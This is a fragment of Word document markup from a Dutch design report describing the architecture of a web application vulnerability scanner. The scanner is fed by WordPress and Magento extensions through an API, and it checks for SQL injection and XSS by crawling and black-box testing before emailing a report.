style="position:absolute;left:0;text-align:left;margin-left:-50.65pt;margin-top:181.05pt;width:546.8pt;height:21.2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r8pjgCAAB4BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EGGNtRKgYFdOkqq0E&#10;U5+N4xBLts+zDQn79Ts7CXTdnqa9mPPd5Tvf992xuGu1IifhvART0MloTIkwHEppDgX9vtt8uKHE&#10;B2ZKpsCIgp6Fp3fL9+8Wjc3FFGpQpXAEQYzPG1vQOgSbZ5nntdDMj8AKg8EKnGYBr+6QlY41iK5V&#10;Nh2P51kDrrQOuPAevfddkC4TflUJHp6qyotAVEHxbSGdLp37eGbLBcsPjtla8v4Z7B9eoZk0WPQC&#10;dc8CI0cn/4DSkjvwUIURB51BVUkuUg/YzWT8ppttzaxIvSA53l5o8v8Plj+enh2RZUFnM0oM06jR&#10;TrSBfIGWoAv5aazPMW1rMTG06EedB79HZ2y7rZyOv9gQwTgyfb6wG9E4Oue3s9nHOYY4xqbz25vP&#10;nyJMdv3aOh++CtAkGgV1qF4ilZ0efOhSh5RYzIOS5UYqFS8xsFaOnBgq3dQyiB78tyxlYq6B+FUH&#10;2HlEGpW+Smy4ayxaod23iaBpem507aE8IxkOunHylm8kln9gPjwzh/ODTeJOhCc8KgVNQaG3KKnB&#10;/fybP+ajrBilpMF5LKj/cWROUKK+GRQ8Du9guMHYD4Y56jVg4xPcNsuTiR+4oAazcqBfcFVWsQqG&#10;mOFYq6BhMNeh2wpcNS5Wq5SEI2pZeDBbyyP0QPOufWHO9iIFlPcRhkll+Rututykll0dAxKfhLyy&#10;iAMQLzjeaRT6VYz78/qesq5/GMtfAAAA//8DAFBLAwQUAAYACAAAACEAy/q0+OMAAAAMAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPPU/DMBCGdyT+g3VILKi186GIpnGqqoIBlorQhc2Nr3FKbEe204Z/&#10;j5noeHeP3nveajPrgVzQ+d4aDsmSAUHTWtmbjsPh83XxDMQHYaQYrEEOP+hhU9/fVaKU9mo+8NKE&#10;jsQQ40vBQYUwlpT6VqEWfmlHNPF2sk6LEEfXUenENYbrgaaMFVSL3sQPSoy4U9h+N5PmsM+/9upp&#10;Or28b/PMvR2mXXHuGs4fH+btGkjAOfzD8Kcf1aGOTkc7GenJwGGRsCSLLIesSBMgEVmt0rg5cshZ&#10;XgCtK3pbov4FAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAhar8pjgCAAB4BAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAy/q0+OMAAAAMAQAADwAA&#10;AAAAAAAAAAAAAACQBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="198D845E" w14:textId="6FFE9D1A" w:rsidR="00CE4BB5" w:rsidRPr="00F921DA" w:rsidRDefault="00CE4BB5" w:rsidP="003A0936">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.1 vergrote diagram bijlage B</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B015375" w14:textId="77777777" w:rsidR="003A0936" w:rsidRDefault="003A0936" w:rsidP="003A0936"/>
    <w:p w14:paraId="7CEBA536" w14:textId="77777777" w:rsidR="003A0936" w:rsidRDefault="003A0936" w:rsidP="003A0936">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC9144" w14:textId="1D2F08F5" w:rsidR="003A0936" w:rsidRDefault="003A0936"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2686"/>
        <w:gridCol w:w="6376"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B2036" w14:paraId="1524046C" w14:textId="77777777" w:rsidTr="005474F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="297F5671" w14:textId="1D7BEE55" w:rsidR="004B2036" w:rsidRDefault="004B2036">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Systeem Specificatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C1546" w14:paraId="3DE1D467" w14:textId="77777777" w:rsidTr="0047087F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="635F43B4" w14:textId="5C28D256" w:rsidR="006C1546" w:rsidRDefault="00123D47">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58B549EC" w14:textId="251A11B9" w:rsidR="006C1546" w:rsidRDefault="006C1546">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>PHP</w:t>
            </w:r>
            <w:r w:rsidR="00123D47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>, SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C1546" w14:paraId="07F50533" w14:textId="77777777" w:rsidTr="0047087F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E6D6E91" w14:textId="5DD5269B" w:rsidR="006C1546" w:rsidRDefault="006C1546">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Frameworks</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="573784F8" w14:textId="5536E12C" w:rsidR="006C1546" w:rsidRDefault="006C1546">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Laravel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>, Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0047087F" w14:paraId="5659275C" w14:textId="77777777" w:rsidTr="0047087F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21CA4EC5" w14:textId="2B04D45C" w:rsidR="004B2036" w:rsidRDefault="006A52C3">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Sub systemen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="693CA37F" w14:textId="7353A29D" w:rsidR="004B2036" w:rsidRDefault="006A52C3">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A24EF" w14:paraId="0043B678" w14:textId="77777777" w:rsidTr="005A24EF">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CFFCFA5" w14:textId="61AE05A8" w:rsidR="005A24EF" w:rsidRDefault="005A24EF">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Systeem lagen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CCDDA7C" w14:textId="51470B94" w:rsidR="005A24EF" w:rsidRDefault="005A24EF">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C2071" w14:paraId="2C3E296A" w14:textId="77777777" w:rsidTr="003C2071">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29E8ADB6" w14:textId="72A653B1" w:rsidR="003C2071" w:rsidRDefault="001C4D6E">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Communicatielijnen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E5CE15A" w14:textId="6F85D083" w:rsidR="003C2071" w:rsidRDefault="003C2071">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54B2B336" w14:textId="712B425F" w:rsidR="0030306C" w:rsidRDefault="00CD130C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tabel 4.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECD37FC" w14:textId="4CF4FABA" w:rsidR="00171C2A" w:rsidRPr="00665613" w:rsidRDefault="00A86748">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00665613">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CMS extensie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="420012BD" w14:textId="25D3C49D" w:rsidR="0044712F" w:rsidRDefault="002A5EB9">
      <w:r>
        <w:t xml:space="preserve">Er zijn twee soorten </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS extensies</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Het doel van de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">CMS </w:t>
      </w:r>
      <w:r w:rsidR="0044712F">
        <w:t>extensies</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0044712F">
        <w:t xml:space="preserve"> is om het systeem met een “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0044712F">
        <w:t>endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0044712F">
        <w:t xml:space="preserve">” te voorzien om een brug te slaan tussen de klant en het systeem. Met de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0044712F">
        <w:t>CMS extensie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0044712F">
        <w:t xml:space="preserve"> heeft de klant de mogelijkheid om een aanvraag te doen op een scan. Het CMS biedt hiervoor een formulier aan.</w:t>
      </w:r>
      <w:r w:rsidR="006A763D">
        <w:t xml:space="preserve"> Ook maakt het deel uit van de registratie proces van een klant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F91486C" w14:textId="77777777" w:rsidR="0044712F" w:rsidRPr="00665613" w:rsidRDefault="0044712F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665613">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D439140" w14:textId="58951A3D" w:rsidR="00A86748" w:rsidRDefault="00915BD8">
      <w:r>
        <w:t>De API is ervoor om</w:t>
      </w:r>
      <w:r w:rsidR="0030745E">
        <w:t xml:space="preserve"> het systeem te voorzien met de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> communicatie tussen de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS extensie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="0030745E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A6046E">
        <w:t xml:space="preserve">Essentieel zal het alleen maar zorgen dat de aanvraag via een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A6046E">
        <w:t>HTTP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A6046E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A6046E">
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A6046E">
        <w:t xml:space="preserve"> door gecommuniceerd kan worden naar de </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00A6046E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A087D1D" w14:textId="3CC52463" w:rsidR="006D07BD" w:rsidRPr="00665613" w:rsidRDefault="00B21DE6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665613">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F88777" w14:textId="7D3C6D2D" w:rsidR="00B8440B" w:rsidRDefault="00BA2833">
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> staat centraal</w:t>
      </w:r>
      <w:r w:rsidR="00BA3D3D">
        <w:t xml:space="preserve"> in het systeem. Dit subsysteem zorgt ervoor dat de webapplicatie, die opgegeven is voor een scan, gescand wordt om kwetsbaarheden binnen de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BA3D3D">
        <w:t xml:space="preserve">web </w:t>
      </w:r>
      <w:r w:rsidR="00A61D36">
        <w:t>applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A61D36">
        <w:t xml:space="preserve"> te identificeren.</w:t>
      </w:r>
      <w:r w:rsidR="00B8440B">
        <w:t xml:space="preserve"> Hierop volgt nog een voorproces dat het systeem met data voorziet zoals de hyperlinks waarmee het de gesimuleerde aanvallen mee uitvoert. In dit proces wordt het doelwit gecrawld voor data. Crawlen is het schrapen van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B8440B">
        <w:t>HTML documenten</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B8440B">
        <w:t xml:space="preserve"> opzoek naar een bepaalde HTML element. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26198915" w14:textId="2D7D4DD2" w:rsidR="008C792B" w:rsidRDefault="003A498C">
      <w:r>
        <w:t xml:space="preserve">Na het afronden van de crawl proces worden de gesimuleerde aanvallen op het doelwit uitgevoerd. </w:t>
      </w:r>
      <w:r w:rsidR="000A0651">
        <w:t xml:space="preserve">Dit doet het doormiddel van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A0651">
        <w:t>Blackbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A0651">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A0651">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00032698">
        <w:t>esting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D3B2A">
        <w:t xml:space="preserve"> (H 3.4.1)</w:t>
      </w:r>
      <w:r w:rsidR="00493448">
        <w:t xml:space="preserve"> wat een techniek is die van buitenaf een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00493448">
        <w:t>software ap</w:t>
      </w:r>
      <w:r w:rsidR="00E775DF">
        <w:t>plicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E775DF">
        <w:t xml:space="preserve"> probeert open te breken</w:t>
      </w:r>
      <w:r w:rsidR="00421CC7">
        <w:t xml:space="preserve">, zonder kennis te hebben over de interne werking </w:t>
      </w:r>
      <w:r w:rsidR="00C17B73">
        <w:t>van het</w:t>
      </w:r>
      <w:r w:rsidR="00421CC7">
        <w:t xml:space="preserve"> doelwit</w:t>
      </w:r>
      <w:r w:rsidR="00E775DF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00597F47">
        <w:t xml:space="preserve"> Er wordt naar twee soorten kwetsbaarheden gezocht (H </w:t>
      </w:r>
      <w:r w:rsidR="008305BE">
        <w:t>3.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00597F47">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="008305BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00054686">
        <w:t>SQL injectie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00054686">
        <w:t xml:space="preserve"> en Cross-site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00054686">
        <w:t>scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00054686">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00D83209">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00054686">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00246F05">
        <w:t>, deze twee kwetsbaarheden behoren tot</w:t>
      </w:r>
      <w:r w:rsidR="005B0615">
        <w:t xml:space="preserve"> de basis van bijna iedere scan, zijn veelvoorkomend en hebben een hoge risico factor</w:t>
      </w:r>
      <w:r w:rsidR="008D609A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B0615">
        <w:t xml:space="preserve">(OWASP, H 3.2.1). </w:t>
      </w:r>
      <w:r w:rsidR="00C17B73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004666BC">
        <w:t xml:space="preserve">Een andere take die de </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="004666BC">
        <w:t xml:space="preserve"> uitvoert is het genereren van een rapport dat gebaseerd is op de geïdentificeerde kwetsbaarheden en het verzenden van het rapport naar de klant toe via de email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072BC43E" w14:textId="28C1F2F2" w:rsidR="006C16A2" w:rsidRDefault="006277D0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251954176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33920761" wp14:editId="0431E970">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1002030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2223135</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3414395" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="480" name="Text Box 480"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3414395" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0FC236EE" w14:textId="3B59A6CB" w:rsidR="00CE4BB5" w:rsidRPr="005C4FCC" w:rsidRDefault="00CE4BB5" w:rsidP="006277D0">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 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20761" id="Text Box 480" o:spid="_x0000_s1059" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:78.9pt;margin-top:175.05pt;width:268.85pt;height:21.25pt;z-index:25195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HT6zoCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EKGUUESpGxTQJtZVg&#10;6rNxHGLJ9nm2IWG/fmcnoV23p2kv5nx3/i7fd3cs7hutyFk4L8HkdDQYUiIMh0KaY06/7zefZpT4&#10;wEzBFBiR04vw9H758cOitnMxhgpUIRxBEOPntc1pFYKdZ5nnldDMD8AKg8ESnGYBr+6YFY7ViK5V&#10;Nh4Op1kNrrAOuPAevQ9tkC4TflkKHp7K0otAVE7x20I6XToP8cyWCzY/OmYrybvPYP/wFZpJg0Wv&#10;UA8sMHJy8g8oLbkDD2UYcNAZlKXkInFANqPhOza7ilmRuKA43l5l8v8Plj+enx2RRU4nM9THMI1N&#10;2osmkC/QkOhDhWrr55i4s5gaGgxgp3u/R2ck3pROx1+kRDCOWJervhGOo/NmMprc3N1SwjE2nt7N&#10;Pt9GmOz1tXU+fBWgSTRy6rB/SVZ23vrQpvYpsZgHJYuNVCpeYmCtHDkz7HVdySA68N+ylIm5BuKr&#10;FrD1iDQsXZVIuCUWrdAcmiTReNqzPkBxQTEctAPlLd9ILL9lPjwzhxOE/HErwhMepYI6p9BZlFTg&#10;fv7NH/OxsRilpMaJzKn/cWJOUKK+GWx5HN/ecL1x6A1z0mtA4iPcN8uTiQ9cUL1ZOtAvuCyrWAVD&#10;zHCsldPQm+vQ7gUuGxerVUrCIbUsbM3O8gjdy7xvXpizXZMCtvcR+lll83e9anNTt+zqFFD41Mgo&#10;bKsiDkC84ICnUeiWMW7Q23vKev3LWP4CAAD//wMAUEsDBBQABgAIAAAAIQCErq644gAAAAsBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUhcEHX6k5SGOFVVwYFeKtJeuLnxNg7EdmQ7&#10;bXh7lhMcZ2c0822xHk3HLuhD66yA6SQBhrZ2qrWNgOPh9fEJWIjSKtk5iwK+McC6vL0pZK7c1b7j&#10;pYoNoxIbcilAx9jnnIdao5Fh4nq05J2dNzKS9A1XXl6p3HR8liQZN7K1tKBlj1uN9Vc1GAH7xcde&#10;Pwznl91mMfdvx2GbfTaVEPd34+YZWMQx/oXhF5/QoSSmkxusCqwjnS4JPQqYp8kUGCWyVZoCO9Fl&#10;NcuAlwX//0P5AwAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACVR0+s6AgAAegQAAA4AAAAA&#10;AAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAISurrjiAAAACwEAAA8A&#10;AAAAAAAAAAAAAAAAkgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAChBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0FC236EE" w14:textId="3B59A6CB" w:rsidR="00CE4BB5" w:rsidRPr="005C4FCC" w:rsidRDefault="00CE4BB5" w:rsidP="006277D0">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.2</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251952128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48BF56D3" wp14:editId="67BA3D9F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1002030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>708025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3414395" cy="1511300"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:wrapTopAndBottom/>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software lagen.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3414395" cy="1511300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
